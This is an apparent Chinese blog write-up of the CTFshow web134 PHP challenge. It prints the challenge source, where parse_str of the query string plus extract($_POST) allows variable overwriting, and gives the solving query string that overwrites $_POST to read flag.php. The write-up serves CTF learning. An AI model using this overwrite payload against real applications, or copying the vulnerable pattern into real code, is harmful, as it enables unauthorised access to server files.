CTFshow php特性 web134
目录
- 源码
- 思路
- 题解
- 总结
源码
<?php/*
# -*- coding: utf-8 -*-
# @Author: Firebasky
# @Date: 2020-10-13 11:25:09
# @Last Modified by: h1xa
# @Last Modified time: 2020-10-14 23:01:06*/highlight_file(__FILE__);
$key1 = 0;
$key2 = 0;
if(isset($_GET['key1']) || isset($_GET['key2']) || isset($_POST['key1']) || isset($_POST['key2'])) {die("nonononono");
}
@parse_str($_SERVER['QUERY_STRING']);
extract($_POST);
if($key1 == '36d' && $key2 == '36d') {die(file_get_contents('flag.php'));
}
思路
这题很简单,考点还是变量覆盖
本地测试一下
parse_str($_SERVER['QUERY_STRING']);
extract($_POST);
var_dump(get_defined_vars());
我们传入?_POST[a]=1&_POST[b]=12
经过parse_str($_SERVER['QUERY_STRING'])
post中存在了array(2) { ["a"]=> string(1) "1" ["b"]=> string(2) "12" }
经过 extract($_POST);
成功创建变量a,b并覆盖值
题解
?_POST[key1]=36d&_POST[key2]=36d
``
总结
水题
CTFshow php特性 web134相关推荐
- ctfshow php特性 下
目录 web113 web114 web115 web123(php解析特性) web125 web126 web127(php解析特性) web128 web129 web130 web131 we ...
- ctfshow php特性(89——150plus)
web89 这题的逻辑是如果存在$_GET['num'],则用正则表达式匹配$num中的值,如果成功匹配则程序终止于"no no no",否则进行下一步,如果intval($num ...
- ctfshow php特性 web89-web115 web123-150wp
php特性 参考博客仍然是南神博客 文章目录 php特性 web89 web90 web91 web92 web93 web94 web95 web96 web97 web98 web99 web10 ...
- CTFshow——PHP特性(下)
目录: web132--逻辑运算符的优先级 web133--curl -F web134--php变量覆盖 web135-- >xx.txt 写文件 web136-- tee命令 web137- ...
- CTFshow php特性 web150plus
目录 源码 思路 题解 总结 源码 <?php/* # -*- coding: utf-8 -*- # @Author: h1xa # @Date: 2020-10-13 11:25:09 # ...
- CTFshow php特性 web150
目录 源码 思路 题解 总结 源码 <?php/* # -*- coding: utf-8 -*- # @Author: h1xa # @Date: 2020-10-13 11:25:09 # ...
- CTFshow php特性 web147
目录 源码 思路 题解 总结 源码 <?php/* # -*- coding: utf-8 -*- # @Author: h1xa # @Date: 2020-10-13 11:25:09 # ...
- CTFshow php特性 web140
目录 源码 思路 题解 总结 源码 <?php/* # -*- coding: utf-8 -*- # @Author: h1xa # @Date: 2020-10-13 11:25:09 # ...
- CTFshow php特性 web138
目录 源码 思路 题解 总结 源码 <?php/* # -*- coding: utf-8 -*- # @Author: h1xa # @Date: 2020-10-13 11:25:09 # ...
最新文章
- ionic3中使用自定义配置
- erlang-百度云推送Android服务端功能实现-erlang
- 【转】自然语言系列学习之表示学习与知识获取(八)利用远程监督多实例的关系抽取
- ***快速理解Docker - 容器级虚拟化解决方案
- CSDN博客如何调整文字的字体、大小、颜色
- 999元抓出奢侈品包包,万亿市场在实体店找到了新春天!
- iOS 逆向 - 收藏集 - 掘金
- NodeJS写模块和引入模块的例子
- html日期默认,html日期控件默认设置为当天日期
- php网站动态实例教程,PHP动态网站开发实例教程
- wps带阴影的边框怎么设置_win7系统下wps阴影边框如何设置
- 4万字长文全面解读数据中台、数据仓库和数据湖
- iMX8MP方案推荐|一款适用于心电监护仪的嵌入式核心板
- 【一文带你读懂机器学习】逻辑回归原理
- 算法——实现随机拿到30道不重复的20以内的加减法题目
- 简单了解logger.debug
- 开始尝试淘宝直通车推广
- 通过耳道形状来验证用户身份?苹果:未来,AirPods可能实现
- Sketch Mirror不能用?那就用Skala Preview手机预览Sketch
- 数据:锁定在智能合约中的MKR供应占比已创下16个月新高